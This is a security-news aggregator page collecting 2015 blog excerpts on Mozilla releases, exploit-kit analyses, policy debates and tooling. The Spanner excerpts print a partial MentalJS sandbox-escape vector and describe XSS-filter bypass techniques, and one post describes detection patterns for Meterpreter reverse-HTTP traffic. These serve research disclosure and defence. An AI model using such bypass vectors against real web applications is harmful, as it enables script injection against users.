Web App Security

  • Most Topular Stories

  • MozDef: The Mozilla Defense Platform v1.9

    Mozilla Security Blog
    Jeff Bryner
    20 May 2015 | 3:26 pm
    At Mozilla we’ve been using The Mozilla Defense Platform (lovingly referred to as MozDef) for almost two years now and we are happy to release v1.9. If you are unfamiliar, MozDef is a Security Information and Event Management (SIEM) overlay for ElasticSearch. MozDef aims to bring real-time incident response and investigation to the defensive tool kits of security operations groups in the same way that Metasploit, LAIR and Armitage have revolutionized the capabilities of attackers. We use MozDef to ingest security events, alert us to security issues, investigate suspicious activities,…
  • The Way Forward for Chris Roberts, One World Labs

    Liquidmatrix Security Digest
    Bill Brenner
    18 May 2015 | 4:42 am
    The plight of One World Labs Founder Chris Roberts has been picked to death on social media this past week. There’s all the trouble he’s in with the FBI for his airplane-hacking claims. There’s the hit to his company, which had to let a lot of good security talent go last week. Some shake their heads in disbelief because he apparently spoke to the FBI about his activities without a lawyer present. Others saw this saga as an example of hackers shooting off their mouths without the scruples to back it up. Me? I’m looking at this and seeing a way forward for Chris…
  • Machine Translators May Leak Confidential Information

    Zscaler Research
    Loren Weith
    26 May 2015 | 7:49 am
    One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.
  • How I smashed MentalJS

    The Spanner
    Gareth Heyes
    3 May 2015 | 9:08 am
    I’m proud to introduce a guest blogger on The Spanner. Jann Horn is a IT Security student in fourth semester and works for Cure53. He has found security issues in a bunch of open source projects, including OpenSSH(CVE-2014-2532), Chromium(CVE-2014-1726,CVE-2015-1247), Android(CVE-2014-7911) and Angular. He’s also a member of the university CTF team FluxFingers. Jann has been testing my MentalJS project and found some really cool flaws… MentalJS vuln writeup This is a writeup about three somewhat similar ways to escape the MentalJS sandbox (and two bugs that didn’t lead…
  • Creating a mobile app from a simple HTML site: Part 4

    Mozilla Hacks - the Web developer blog
    Piotr Zalewa
    26 May 2015 | 3:15 pm
    How to polish your app and prepare it for market In previous sections of this step-by-step series (Part 1, Part 2, and Part 3) we’ve created an app that loads multiple school plans from the server. What we have so far is functional, but still has a number of issues, including two which are major: no offline mode and a hard-coded configuration. In this closing post, we’ll work on all of these issues. If you haven’t built up the examples from the previous parts, use stage7 app and stage7 server as a starting point. To get started, follow the instructions on how to load any…
  • add this feed to my.Alltop

    Mozilla Security Blog

  • MozDef: The Mozilla Defense Platform v1.9

    Jeff Bryner
    20 May 2015 | 3:26 pm
    At Mozilla we’ve been using The Mozilla Defense Platform (lovingly referred to as MozDef) for almost two years now and we are happy to release v1.9. If you are unfamiliar, MozDef is a Security Information and Event Management (SIEM) overlay for ElasticSearch. MozDef aims to bring real-time incident response and investigation to the defensive tool kits of security operations groups in the same way that Metasploit, LAIR and Armitage have revolutionized the capabilities of attackers. We use MozDef to ingest security events, alert us to security issues, investigate suspicious activities,…
  • May 2015 CA Communication

    kwilson
    12 May 2015 | 12:13 pm
    Mozilla has sent a Communication to the Certification Authorities (CAs) who have root certificates included in Mozilla’s program. Mozilla’s CA Certificate Program governs inclusion of root certificates in Network Security Services (NSS), a set of open source libraries designed to support cross-platform development of security-enabled client and server applications. The NSS root certificate store is not only used in Mozilla products such as the Firefox browser, but is also used by other companies in a variety of applications. The CA Communication has been emailed to the Primary Point of…
  • Deprecating Non-Secure HTTP

    rbarnes
    30 Apr 2015 | 3:24 pm
    Today we are announcing our intent to phase out non-secure HTTP. There’s pretty broad agreement that HTTPS is the way forward for the web.  In recent months, there have been statements from IETF, IAB (even the other IAB), W3C, and the US Government calling for universal use of encryption by Internet applications, which in the case of the web means HTTPS. After a robust discussion on our community mailing list, Mozilla is committing to focus new development efforts on the secure web, and start removing capabilities from the non-secure web.  There are two broad elements of this plan:…
  • Removing e-Guven CA Certificate

    kwilson
    27 Apr 2015 | 1:12 pm
    The Certification Authority (CA) certificate owned by e-Guven Elektronik Bilgi Guvenligi A.S. will be removed in Firefox 38 due to insufficient and outdated audits. The integrity of the secure Web depends on CAs issuing certificates that correctly attest to the identity of websites. Mozilla products ship a default list of CA certificates, which may change with each security patch or new version of the product. Inclusion of a CA certificate in Mozilla products involves a rigorous process and evaluation of the CA’s public-facing policy documentation and audit statements, in order to verify…
  • Distrusting New CNNIC Certificates

    kwilson
    2 Apr 2015 | 10:36 am
    Last week, Mozilla was notified that a Certificate Authority (CA) called CNNIC had issued an unconstrained intermediate certificate, which was subsequently used by the recipient to issue certificates for domain names the holder did not own or control (i.e., for MitM). We added the intermediate certificate in question to Firefox’s direct revocation system, called OneCRL, and have been further investigating the incident. After reviewing the circumstances and a robust discussion on our public mailing list, we have concluded that CNNIC’s behaviour in issuing an unconstrained intermediate…
 
  • add this feed to my.Alltop

    Liquidmatrix Security Digest

  • The Way Forward for Chris Roberts, One World Labs

    Bill Brenner
    18 May 2015 | 4:42 am
    The plight of One World Labs Founder Chris Roberts has been picked to death on social media this past week. There’s all the trouble he’s in with the FBI for his airplane-hacking claims. There’s the hit to his company, which had to let a lot of good security talent go last week. Some shake their heads in disbelief because he apparently spoke to the FBI about his activities without a lawyer present. Others saw this saga as an example of hackers shooting off their mouths without the scruples to back it up. Me? I’m looking at this and seeing a way forward for Chris…
  • “Equal Respect” at ‪#‎RSAC

    Bill Brenner
    21 Apr 2015 | 9:06 am
    Some folks in the security industry see me as a member of the “Equal Respect” movement against so-called booth babes at conferences. Not exactly. I certainly respect the opinion of people attached to the cause, and good for them, fighting for what they believe in. But for me, this has never been about equal respect among the genders. It’s never been about whether women who work as booth babes are being exploited sexually. For me, it’s been about holding vendors’ feet to the fire and making them work harder to build an exhibit off the strength of the products. To…
  • In the end, @Sidragon1’s Tweet was the problem

    Bill Brenner
    21 Apr 2015 | 6:24 am
    At RSA Conference 2015 here in San Francisco, there’s a lot of discussion about weaknesses to the electrical and wifi systems aboard airplanes. The discussion often turns to the case of hacker Chris Roberts (@Sidragon1 on Twitter). There’s been a lot of strong reaction to news of Roberts being pulled from a plane for jokingly tweeting that he might mess around with the plane’s electronic systems. There’s a lot of overreaction to this story. The TSA and feds certainly overreacted. But those who hold Roberts up as a victim of government oppression are overreacting, too.
  • Videos from #BSidesSF

    Bill Brenner
    21 Apr 2015 | 5:49 am
    If you missed BSidesSF, you now have a chance to see everything that happened there, thanks to the efforts of @irongeek_adc. He has already posted a full plate of videos from BSidesSF. Go to his website for the full index of videos, which capture the presentations given over the last two days. Our thanks to @irongeek_adc for all the great work. The post Videos from #BSidesSF appeared first on Liquidmatrix Security Digest.
  • RSA Parties 2015

    Dave Lewis
    14 Apr 2015 | 8:32 pm
    Nothing like waiting until the very last minute to post an RSA Parties 2015 list. Day jobs + kids = you get the idea. That being said, I’m happy to note that Akamai Technologies (my day job) will be hosting a party this year in conjunction with AT&T. Be sure to come out and meet @csoandy, @billbrenner70, @mckeay and myself @gattaca. Now, this is a simple curated RSA Parties 2015 list but, if you want the mother lode be sure to check out @RSAParties for the rest. If you really want to have your party listed just drop me a line via tips AT liquidmatrix DOT org. This table works…
  • add this feed to my.Alltop

    Zscaler Research

  • Machine Translators May Leak Confidential Information

    Loren Weith
    26 May 2015 | 7:49 am
    One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.
  • RIG Exploit Kit Infection Cycle Analysis

    John Mancuso
    20 May 2015 | 11:14 am
    Overview Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle. Delivery
  • Magnitude Exploit Kit leading to Ransomware via Malvertising

    Chris Mannon
    18 May 2015 | 9:54 am
    Magnitude Exploit Kit is a malicious exploit package that leverages a victim’s vulnerable browser plugins in order to download a malicious payload to a system.  This technique is known as a drive-by-download attack, which is often leveraged on compromised websites and malicious advertising networks. We recently found a number of compromised pages following the structure of fake search engine
  • Compromised WordPress sites leaking credentials

    Sameer Patil
    7 May 2015 | 4:15 pm
    Zscaler recently observed a credentials leak campaign on multiple WordPress sites. The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. Till now, we have identified only one domain "conyouse.com" which is collecting all the credentials from these compromised
  • IRC Botnets alive, effective & evolving

    Nirmal Singh
    23 Apr 2015 | 10:12 am
    Introduction An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel. It usually involves a Botnet operator controlling the IRC bots through a previously configured IRC server & channel. The Botnet operator, after appropriate checks, periodically moves the IRC bot to a new IRC channel to thwart researchers & automated sandboxes from
 
  • add this feed to my.Alltop

    The Spanner

  • How I smashed MentalJS

    Gareth Heyes
    3 May 2015 | 9:08 am
    I’m proud to introduce a guest blogger on The Spanner. Jann Horn is a IT Security student in fourth semester and works for Cure53. He has found security issues in a bunch of open source projects, including OpenSSH(CVE-2014-2532), Chromium(CVE-2014-1726,CVE-2015-1247), Android(CVE-2014-7911) and Angular. He’s also a member of the university CTF team FluxFingers. Jann has been testing my MentalJS project and found some really cool flaws… MentalJS vuln writeup This is a writeup about three somewhat similar ways to escape the MentalJS sandbox (and two bugs that didn’t lead…
  • MentalJS DOM bypass

    Gareth Heyes
    6 Mar 2015 | 1:16 pm
    Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:- _=document x =_.createElement('script'); s =_.createElement('style') s.innerHTML = '*/alert(location)//' t=_.createElement('b') t.textContent = '/*' x.insertBefore(t.firstChild, null); x.insertBefore(s, null) _.body.appendChild(x) x =_.createElement('script'); s =_.createElement('style') s.innerHTML = _.getElementsByTagName('script')[2].textContent x.insertBefore(s.firstChild,…
  • Another XSS auditor bypass

    Gareth Heyes
    19 Feb 2015 | 11:50 am
    This bug is similar to the last one I posted but executes in a different context. It requires an existing script after the injection because we use it to close the injected script. It’s a shame chrome doesn’t support self closing scripts in HTML or within a SVG element because I’m pretty sure I could bypass it without using an existing script. Anyway the injection uses a data url with a script. In order to bypass the filter we need to concat the string with the quote from the attribute or use html entities such as //. The HTML parser doesn’t care how…
  • XSS Auditor bypass

    Gareth Heyes
    10 Feb 2015 | 11:56 am
    XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this: <script>x = "MY INJECTION"</script> As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML…
  • Bypassing the IE XSS filter

    Gareth Heyes
    7 Jan 2015 | 1:06 pm
    Mario noticed that the new version of the IE filter blocks anchors in attempt to prevent the same origin bypass where you double encode the vector and post a link to itself. I had to take a look and see if I could break it and…of course I did. The regex is very generic:- <a.*?hr{e}f This could cause problems with information disclosure if you can put something in between the “a” and “href” and detect if the filter is active which I’ll admit is pretty tricky now with the new protection against such attacks. Anyway lets move onto the vectors. I literally…
  • add this feed to my.Alltop

    Mozilla Hacks - the Web developer blog

  • Creating a mobile app from a simple HTML site: Part 4

    Piotr Zalewa
    26 May 2015 | 3:15 pm
    How to polish your app and prepare it for market In previous sections of this step-by-step series (Part 1, Part 2, and Part 3) we’ve created an app that loads multiple school plans from the server. What we have so far is functional, but still has a number of issues, including two which are major: no offline mode and a hard-coded configuration. In this closing post, we’ll work on all of these issues. If you haven’t built up the examples from the previous parts, use stage7 app and stage7 server as a starting point. To get started, follow the instructions on how to load any…
  • ES6 In Depth: Rest parameters and defaults

    Benjamin Peterson
    21 May 2015 | 1:32 pm
    ES6 In Depth is a series on new features being added to the JavaScript programming language in the 6th Edition of the ECMAScript standard, ES6 for short. Today’s post is about two features that make JavaScript’s function syntax more expressive: rest parameters and parameter defaults. Rest parameters A common need when creating an API is a variadic function, a function that accepts any number of arguments. For example, the String.prototype.concat method takes any number of string arguments. With rest parameters, ES6 provides a new way to write variadic functions. To demonstrate, let’s…
  • Developer Edition 40: Always active network monitoring, CSS rules filtering, and much more

    Brian Grinstead
    19 May 2015 | 9:55 am
    Firefox 40 was just uplifted, and we have a lot of updates to share. This release took a major effort by Developer Tools contributors to address feedback we’ve heard directly from people using our tools. Grab a copy of the Developer Edition browser and check it out. Experimental Multi-process Support: A Request When you update to Developer Edition 40, you’ll be prompted to opt in to test multi-process Firefox. Please consider helping us test this new feature and providing feedback around any issues you see. New in the Inspector There is now a filter box in the CSS Rules view that…
  • Let’s get charged: Updates to the Battery Status API

    Francesco Iovine
    18 May 2015 | 12:29 pm
    Web APIs provide a way for Open Web Apps to access device hardware, data and sensors through JavaScript, and open the doors to a number of possibilities especially for mobile devices, TVs, interactive kiosks, and Internet of Things (IoT) applications. Knowing the battery status of a device can be useful in a number of situations or use cases. Here are some examples: Utility apps that collect statistics on battery usage or simply inform the user if the device is charged enough to play a game, watch a movie, or browse the Web. High-quality apps that optimize battery consumption: for example, an…
  • Diving into Rust for the first time

    Szmozsánszky István
    15 May 2015 | 10:28 am
    Rust is a new programming language which focuses on performance, parallelization, and memory safety. By building a language from scratch and incorporating elements from modern programming language design, the creators of Rust avoid a lot of “baggage” (backward-compatibility requirements) that traditional languages have to deal with. Instead, Rust is able to fuse the expressive syntax and flexibility of high-level languages with the unprecedented control and performance of a low-level language. Choosing a programming language usually involves tradeoffs. While most modern high-level…
 
  • add this feed to my.Alltop

    Didier Stevens

  • Howto: Install Wireshark Dissectors

    Didier Stevens
    17 May 2015 | 5:00 pm
    I teach a Wireshark class at Brucon 2015. If you want to use my Wireshark dissectors like TCP Flag dissector, but don’t know how to install a Wireshark dissector, then watch this video howto:
  • Detecting Network Traffic from Metasploit’s Meterpreter Reverse HTTP Module

    Didier Stevens
    10 May 2015 | 10:52 pm
    I teach a Wireshark class at Brucon 2015. I took a closer look at Metasploit’s Meterpreter network traffic when reverse http mode is used. The Meterpreter client will make regular HTTP requests to the Metasploit server to check if it has commands ready to be executed. This is how a request looks like: The client sends an HTTP POST request with a 4-byte payload: RECV. The URI has the following pattern: 4 or 5 alphanumeric characters, an underscore and 16 alphanumeric characters. The 16 alphanumeric characters are chosen at random, and the 4 or 5 alphanumeric characters are some kind of…
  • Update: NAFT Version 0.0.9

    Didier Stevens
    6 May 2015 | 6:55 am
    This update to NAFT adds support for YARA. YARA rules can be used to search through the heap, like this: naft-icd.py -y IOS_canary.yara –decoders decoder_xor1 heap r870-core Address Bytes Prev Next Ref PrevF NextF Alloc PC what 83AB9498 0000004100 83AB9444 83ABA4CC 001 -------- -------- 80B5CC7C 8253709C YARA rule: IOS_canary Rule IOS_canary.yara searches for a canary value inside the blocks. rule IOS_canary { strings: $canary = {FD 01 10 DF} condition: $canary } NAFT_V0_0_9.zip (https) MD5: FEBBDB892D631275A95A0FEA59F8519F SHA256:…
  • pdf-parser: A Method To Manipulate PDFs Part 2

    Didier Stevens
    28 Apr 2015 | 5:00 pm
    I provide 2 days of Hacking PDF training at HITB Amsterdam. This is one of the methods I teach. Maarten Van Horenbeeck posted a diary entry (July 2008) explaining how scripts and data are stored in PDF documents (using streams), and demonstrated a Perl script to decompress streams. A couple of months before, I had started developing my pdf-parser tool, and Maarten’s diary entry motivated me to continue adding features to pdf-parser. Extracting and decompressing a stream (for example containing a JavaScript script) is easy with pdf-parser. You select the object that contains the stream…
  • Update: virustotal-search Version 0.1.2 Daily Quota Handling and CVEs

    Didier Stevens
    26 Apr 2015 | 5:00 pm
    This new version op virustotal-search adds a bunch of options to manage the local database, and 2 features I want to highlight here: 1) If you exceed your daily quota, virustotal-search will now do a clean stop. You can use option -w (waitquota) to instruct virustotal-search to wait until your daily quota is reset, and then continue. The quota reset is tested by doing a query every hour. 2) A new column was added to the CSV output: CVEs. virustotal-search will extract CVE numbers from AV detection signatures and report them in column CVEs. And I also worked together with VirusTotal so that…
  • add this feed to my.Alltop

    CERIAS Combined Feed

  • Two Items of interest

    Gene Spafford
    20 May 2015 | 11:47 am
    Here are a couple of items of possible interest to some of you. First, a group of companies, organizations, and notable individuals signed on to a letter to President Obama urging that the government not mandate “back doors” in computing products. I was one of the signatories. You can find a news account about the letter here and you can read the letter itself here. I suggest you read the letter to see the list of signers and the position we are taking. Second, I’ve blogged before about the new book by Carey Nachenberg — a senior malware expert who is one of the co-authors of Norton…
  • Login System Supplies Fake Passwords to Hackers

    CERIAS Webmaster
    20 May 2015 | 7:27 am
    Called ErsatzPasswords, the system is aimed at throwing off hackers who use methods to “crack” passwords, said Mohammed H. Almeshekah, a doctoral student at Purdue University in Indiana. More information »
  • Rogers Named Department Head of Computer and Information Technology

    CERIAS Webmaster
    4 May 2015 | 10:40 am
    (Written by John O’Malley | April 23, 2015 | ) Marcus Rogers, Ph.D., has been appointed head of the Department of Computer and Information Technology. Rogers, whose appointment will be effective May 1, has been serving as interim department head since July 2014. He is also director of Purdue’s Cyber Forensics and Security Program, a University Faculty Scholar, advisory committee chair of the Digital Forensics Certification Board, CERIAS Fellow, and a deputized investigator for the Tippecanoe County Sheriff’s Department. Rogers’ recent honors include being named the McDevitt Endowed…
  • Time Critical—Purdue Day of Giving

    Gene Spafford
    27 Apr 2015 | 6:56 pm
    Dear Friends of CERIAS This Wednesday, April 29, will be the second annual Purdue Day of Giving. During this 24-hour online event, CERIAS will be raising awareness and funds for infosec research, security education, and student initiatives. Plus, through a generous pledge from Sypris Electronics, every donation received this Wednesday will be matched, dollar-for-dollar! So, whether its $10 or $10,000, your donation will be doubled and will have twice the impact supporting CERIAS research, education, and programs (i.e. Women in Infosec, student travel grants, student conference scholarships,…
  • Initial Thoughts on the RSA 2015 Conference

    Gene Spafford
    23 Apr 2015 | 5:48 pm
    One again I have submitted myself to a week of talks, exhibits, walking, meetings, drinking, meetings, and more with 40,000 close associates (with one more day of it tomorrow). It’s the annual RSA conference in San Francisco. I’ve been to about 8, including the last 5. Prior to starting this entry, I reread my blog post from after the 2014 RSA Conference. Not a lot has changed, at least as far as talks and exhibits. Pretty much everything I wrote last year is still accurate, so you can read that first. There were a few differences, and I’ll describe the prominent ones below. Once again,…
  • add this feed to my.Alltop

    Security Bloggers Network

  • Answers on how to get started in Security

    CG
    27 May 2015 | 11:08 am
    I got hit up on twitter and email about how to get started in security by someone.  The question was pretty generic and since I didn't even receive a thanks back from the guy I'm sharing it with everyone else/archiving it in case I'm asked again in the future.The question:I want to become proficient at pentesting on computers and phones. I have a running version of Kali Linux on my computer and am using the "Kali Linux Cookbook" as a reference. What book or online tutorials would you recommend for me to use in order to get better? A few things I think you should do to get started.1.
  • Flash Newsflash

    Jason Steer
    27 May 2015 | 10:12 am
    The latest Adobe Flash attack, used by the popular hacker tool Angler is yet another reminder of the importance of securing users with web browsers. Today we make another announcement of a threat group using a relatively new exploit patched by Adobe two weeks ago (CVE-2015-3090). The time between exploit and widespread use is diminishing rapidly; the angler exploit kit is one of the most popular tools used today so it should not be unexpected that many more threat actors will be using this new exploit against unpatched systems in targeted organizations now. The web browser continues to be a…
  • You’ve done all that you can to keep attackers out, but what if they’re already in? : Visit us at InfoSecurity Europe

    Veronica Robinson
    27 May 2015 | 10:12 am
    Imperva will be participating in Europe’s number one information security event – the InfoSecurity Europe Conference, June 02 - 04 in London. I hope you will stop by our stand—#C20—and talk with Imperva security experts...
  • Minimize Your Profile

    Michael Rothschild
    27 May 2015 | 10:01 am
    Think back to the days of grade school. Remember when your teacher was calling on people and you didn’t know the answer, you did what made the most sense, make yourself as small and as unnoticeable as possible so the teacher would not call on you. The notion sounds a bit silly, but this same rule plays out many times over throughout our lives. Keeping a low profile or flying below the radar makes sense in many instances to avoid […] The post Minimize Your Profile appeared first on Data Security Blog | Vormetric.
  • Azure AD Development at //Build/ and Ignite

    Vittorio Bertocci - MSFT
    27 May 2015 | 10:00 am
    New post! http://www.cloudidentity.com/blog/2015/05/27/azure-ad-development-at-build-and-ignite/...(read more)
 
  • add this feed to my.Alltop

    blog.hotspotshield.com

  • Win a tablet and more great prizes!

    Levent Sapci
    27 May 2015 | 8:58 am
    It’s time of the month again to have a giveaway and celebrate our amazing users. Indeed we wouldn’t be here without you guys! Enter below to win! Win a tablet, Amazon Prime & Elite Memberships! What’s to win! 1st Grand Prize: 1 Kindle Fire HD tablet ($99) + 1-year Amazon Prime membership ($100) + 1-year Hotspot Shield Elite membership ($30) 2nd Grand Prize: 1-year Amazon Prime membership ($100) + 1-year Hotspot Shield Elite membership ($30) 10 runner-up winners will each receive: 1-year Hotspot Shield Elite membership ($30) Winners’ Draw and Announcement Winners…
  • Our Recommended Must Watch TV Shows & Movies

    Peter Nguyen
    27 May 2015 | 7:57 am
    With so many choices of movies and shows to choose from, how do you decide which ones to watch? Having choices is great, but it can also make you waste lots of time scrolling through the list. Well, I am going make it easier for you and give you a list of current most popular movies/shows available from streaming services. 1) VIKINGS (S1-3) If you’re a fan of blood, gore, and great battle scenes, you’ll love Vikings. Vikings tells the stories of the Viking Ragnar Lothbrok, a Norse farmer who rises to become the king of medieval Scandivania. Ragnar, an ambitious warrior, thirsts for…
  • Watch UEFA Champions League Final Live Online

    Levent Sapci
    26 May 2015 | 8:26 am
    The UEFA Champions League Final is set. Two of European soccer’s most famous clubs will meet in Berlin to battle for the title. When is the Champions League final? It’s on June 6th, 2015. That’s a Saturday. Cancel all of your plans for that weekend. Or just the Saturday night ones if you’re less keen on watching televised elite European football matches. When does it kick off? 8:45 pm Central European Time. For those of you reading this in the United Kingdom, that will work out at the more familiar time of 7.45 pm BST. If you’re on the east coast of the United…
  • Are WiFi Phone Calls Safe?

    Levent Sapci
    19 May 2015 | 3:20 pm
    In fewer than 10 years, smartphones have revolutionized how we interact with the world and with each other. Carrying a powerful computer in your pocket has countless advantages, but what about the risks? Mobile innovation is moving so fast, driven by a voracious market, that many consumers are jumping to adopt new technologies without stopping to consider the potential risks to their data privacy. One of the latest such developments is WiFi phone calling capability. Here are some things to consider before embracing this relatively new possibility. What is WiFi Calling? Simply stated, WiFi…
  • Do’s and Don’t at a Public WiFi

    Robert Siciliano
    19 May 2015 | 8:56 am
    Public WiFi is the location where you can get online: airport, airplane, coffee house, hotel, motel and more. Many people don’t give this a second thought, unaware of how risky this really is. Public WiFi is very non-secure, a goldmine for hackers who want to steal your identity and commit fraud, destroy your website, you name it. They can do this many ways, including intercepting your activity with an imposter website where you input login details—that the hacker then obtains. But public WiFi will always be risky as long as its proprietors, such as the coffee house, find that enabling…
  • add this feed to my.Alltop

    HackerOne News & Security Blog

  • Legally Blind and Deaf - How Computer Crime Laws Silence Helpful Hackers

    19 May 2015 | 5:00 pm
    A world wide war is being waged in which the most able-bodied soldiers are being discouraged from enlisting. It is an information security war, and hackers are the troops and the weapon designers that have the skills to shape our collective future, for good or for ill.
  • The Wolves of Vuln Street - The First System Dynamics Model of the 0day Market

    13 Apr 2015 | 5:00 pm
    HackerOne has been working with economics and policy researchers from MIT and Harvard to study the economic forces behind the 0day market. Here's what they found.
  • Meet The Newest Member of the HackerOne Team: Stepto, Director of Hacker Success

    6 Apr 2015 | 5:00 pm
    At HackerOne we believe in the power of the research community as an effective way to harden any attack surface. Encouraging, promoting and protecting security research has been integral to our mission since day one. As a key next step in fulfilling this commitment, we are thrilled to announce that Stepto has joined the HackerOne team as the Director of Hacker Success.
  • What's in a Name?

    25 Feb 2015 | 4:00 pm
    While there are many interpretations of the word "hacker," we choose to pay homage to the original MIT hackers by using the term in our company name. We favor their early definition of a hacker: "one who enjoys the intellectual challenge of creatively overcoming limitations."
  • Proposed Changes to the Computer Fraud and Abuse Act, Austin Powers, and You

    15 Jan 2015 | 4:00 pm
    Many security professionals, hackers, lawyers, law enforcement, and members of the media are keenly interested in the White House's proposed changes to laws affecting Internet security. Among the proposed amendments to the Computer Fraud and Abuse Act (CFAA), some of the proposed changes that represent the biggest concerns center around expanded language that pose an increased risk to performing many vulnerability research and security testing activities, and even reporting on breaches.
Log in